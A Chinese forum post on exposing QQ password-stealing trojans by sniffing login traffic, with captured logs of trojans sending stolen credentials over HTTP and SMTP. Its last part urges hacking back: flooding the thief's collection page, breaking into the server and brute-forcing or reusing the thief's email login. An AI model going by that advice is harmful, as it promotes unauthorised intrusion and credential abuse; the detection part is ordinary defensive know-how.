[分享]如何冷静应对偷QQ程序

ccbvip

当发现QQ登陆窗口的密码输入口的保护锁被禁用了 如图中红框所圈 这时你就要小心了，你的机器有90%以上的可能性中了偷QQ的木马了！ 当然，现在盗QQ的程序越做越好了。破坏锁后图标弄成和正常的一样。这就让人郁闷了。 不过不要紧，让我来教你如何对付它！ 首先准备好家伙 ：X-SNIFF 进入X-SNIFF所在目录后 运行命令：xsniff -tcp -asc -pass -log qq.txt =========================== 小知识： 为什么要输入这命令呢？ -tcp 嗅探所有通过TCP协议传输的包 tcp嗅探模式最好配合-asc参数 以ASCII模式输出嗅探数据 这样像“阿拉”那些用ASP来收信的木马的收信地址就会被我们嗅到了！ -pass 嗅探密码 用此参数，可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号密码 =========================== 然后打开QQ登陆窗口 随便输入一个QQ号和密码然后登陆 等出现正登陆的窗口时就可以关掉QQ了（当然，你也可以等到密码报错时关甚至使用真的QQ） 这时，不管是ASP收信还是EMAIL收信的盗QQ木马都会现出原形 例子1： 阿拉的ASP收信模式（嗅探结果） POST /ald/tmdqq.asp HTTP/1.1 Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6 Content-Type: application/x-www-form-urlencoded User-Agent: MyApp Host: http:// 192.168.0.6/ald/tmdqq.asp Content-Length: 25 Cache-Control: no-cache Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON num=74444444&pass=netpatch 他的收信地址为： http:// 192.168.0.6/ald/tmdqq.asp 收信参数为 num=74444444&pass=netpatch 提交模式为： http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch 例子2： 阿拉的Email收信模式（嗅探结果） TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=12 TTL=128 Len=80 ---PA- AUTH LOGIN //请求登陆邮件服务器 TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=18 TTL=52 Len=80 ---PA- 334 dXNlcm5hbWU6 //服务器要求输入用户名 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=10 TTL=128 Len=80 ---PA- dHJ5NHFx //盗贼的EMAIL的ID（base64加密） TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=18 TTL=52 Len=80 ---PA- 334 UGFzc3dvcmQ6 //服务器要求输入EMAIL登陆密码 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=10 TTL=128 Len=80 ---PA- NzQxODUy //盗贼的EMAIL登陆密码（base64加密） TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=31 TTL=52 Len=80 ---PA- 235 Authentication successful //服务器反馈登陆成功标志TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=29 TTL=128 Len=80 ---PA- MAIL FROM: //QQ密码发信地址 TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=13 TTL=52 Len=80 ---PA- 250 Mail OK //反馈设置信息 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=27 TTL=128 Len=80 ---PA- RCPT TO: //QQ密码收信地址TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=13 TTL=52 Len=80 ---PA- 250 Mail OK //反馈设置信息 TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=6 TTL=128 Len=80 ---PA- DATA TCP 202.108.5.141->192.168.0.77 Port: 25->1049 Bytes=37 TTL=52 Len=80 ---PA- 354 End data with . TCP 192.168.0.77->202.108.5.141 Port: 1049->25 Bytes=345 TTL=128 Len=80 ---PA- From: ................ To: Subject:77777----netpatch //QQ号码和密码 Content-Type: text/html; charset="GB2312" L9NTdhkmuwwx113368ACGHJLNQQSUW ------------------------------ ....:77777 ....:netpatch ------------------------------ IP....:218.104.xxx.xxx ........:................ 这时，我们可以有2种方法对付这种偷QQ的 1。用我写的 啊拉ASP收信 攻击程序，发他几万个加QQ和密码过去让他试个爽 2。渗透那服务器。 对于EMAIL接收的，如果对方只用一个EMAIL，那就简单了，拿到密码和ID，你说能做什么呢？如果对方用两个EMAIL，就看你的运气啦，看看密码是否相同或相近？用社会工程学或爆破其密码！ 再不行，还是一样，发一堆假的过去。或者再想别的办法。 其他的盗Q程序基本相同。我就不多说了。 ========================= 有什么错误，请批评指正！